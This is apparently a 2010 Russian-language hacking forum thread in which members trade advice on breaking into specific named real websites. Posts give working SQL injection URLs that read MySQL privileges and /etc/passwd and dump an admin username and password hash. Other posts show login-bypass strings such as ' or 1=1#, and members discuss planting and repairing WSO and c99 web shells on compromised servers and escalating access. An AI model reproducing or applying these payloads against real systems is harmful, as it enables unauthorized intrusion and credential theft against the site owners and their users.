Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    проверяю на запись и пытаюсь записать так:
    union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
    union+select+LOAD_FILE('/etc/passwd')+from+mysql.user

    если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?


    например как быть тут
    http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+file_priv,2,3,4+from+mysql.user+where+user='stmary_stmary'--

    тут ведь нет таблицы user
     
    #12061 jecka3000, 30 Mar 2010
    Last edited: 30 Mar 2010
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    в базе данных "mysql" информация о юзверях всегда в табличке "user", во-первых.

    Во вторых, для начала проверь есть ли доступ к "mysql.user" - если нет, то file_priv в 95% случаев нет


    Смотришь, есть ли доступ к mysql.user.

    Доступа нет.
     
    #12062 попугай, 30 Mar 2010
    Last edited: 30 Mar 2010
    1 person likes this.
  3. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    если нету доступа, то другими способами средствами SQL залить шелл реально?
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    нет, с помощью скули не залить если нет условий для создания файла на серваке посредством БД
     
  5. Taleon

    Taleon New Member

    Joined:
    8 Feb 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Подскажите, пожалуйста, есть здесь SQL Иньекция или нет?
    http://www.klipart.ru/package.php?id=symmetricspiders'
     
  6. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Чего бы и нет.
    -1'+union+select+1+--+ и т.д.
     
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    если есть все условия для шела через скуль, то мона форму загрузки файла с оброботчиком запихнуть, а потом через веб залить нормальный шелл, как вариант
     
    #12067 Strilo4ka, 30 Mar 2010
    Last edited: 30 Mar 2010
    1 person likes this.
  8. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    я только что залил шелл wso 2.4 на сайт, но при попытке зайти пишется:
    Fatal error: Call to undefined function: gzinflate()
    сервер - Apache/2.0.59 (Unix) PHP/4.4.6
    c99 нормально работает, но всё-таки хотелось бы узнать причину..
     
    #12068 daniel_1024, 30 Mar 2010
    Last edited: 30 Mar 2010
  9. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    wso походу сжат и использует функцию gzinflate() для распаковки данных. возможно на сервере отключена или не инсталлирована эта функция(библиотека)
     
  10. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    не могу проверить привилегии
    http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,file_priv,3,4,5,6,7+from+mysql.user+where+user='tourismepmysql'--

    доступ к mysql.user вродь есть, в чем трабла?
     
  11. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    С помощью LOAD_FILE проверь.
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,user,3,4,5,6,7+from+mysql.user--
    
    SELECT command denied to user: '[email protected]' for table 'user'
    
    1. Нет прав на таблу mysql.user - не проверишь
    2. Magic_quotes = ON, where user = 0x746f757269736d65706d7973716c
    3. Слушать BlackSun, но помнить про Magic_quotes = ON
     
    1 person likes this.
  13. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Ы_Ы
    Решено :
    Query failed: Column 'password' cannot be null
    Query failed: Column 'username' cannot be null

    Тока таблица admin пустая1
    Что со схемой - ХЗ! :)
     
    #12073 Strilo4ka, 31 Mar 2010
    Last edited: 31 Mar 2010
  14. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Для работы функции gzinflate необходима библиотека zlib, она появилась в php с версии 4.0.4. По умолчанию поддержка этой библиотеки в PHP не включена. Так что можешь попробовать покапаться в исходниках wso и найти упакованную строку функцией gzdeflate и распаковать у себя, а на сервак залить уже без использования этих функций :)
     
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    На этом сайте:


    http://qatarlc.net/page.php?id=-15+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8+from+test.admin+--+

    у админа странный хэш:

    1:super:202cb962ac59075b964b07152d234b70200820e322 7815ed1756a6b531e7e0d2

    админка тут:

    http://qatarlc.net/admin/

    Подбор хэша:

    202cb962ac59075b964b07152d234b70 - 123
    200820e3227815ed1756a6b531e7e0d2 - qwe123

    Но, это не проходит.

    Как еще можно подобрать хэш, чтобы попасть а админку?
     
  16. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    FlaktW,
    login: 'or+5=5/*
    password: asdfgh
    :D
     
    2 people like this.
  17. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    А почему ты решил, что БД test, а не qatarlc_DB, как говорится в database()?

    warlok, или login: ' or 1=1#
    password: qwerty
    :D
     
    #12077 mr.celt, 31 Mar 2010
    Last edited: 31 Mar 2010
  18. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    на руках лежит "/etc/passwd". как его рационально использовать? можно на фтп попасть?

    cпасибо!
     
  19. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    если у тебя file_priv:Y (есть возможность читать файлы на сервере), попробуй читать исходники страниц сайта...это может очень помочь
     
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл
     
Thread Status:
Not open for further replies.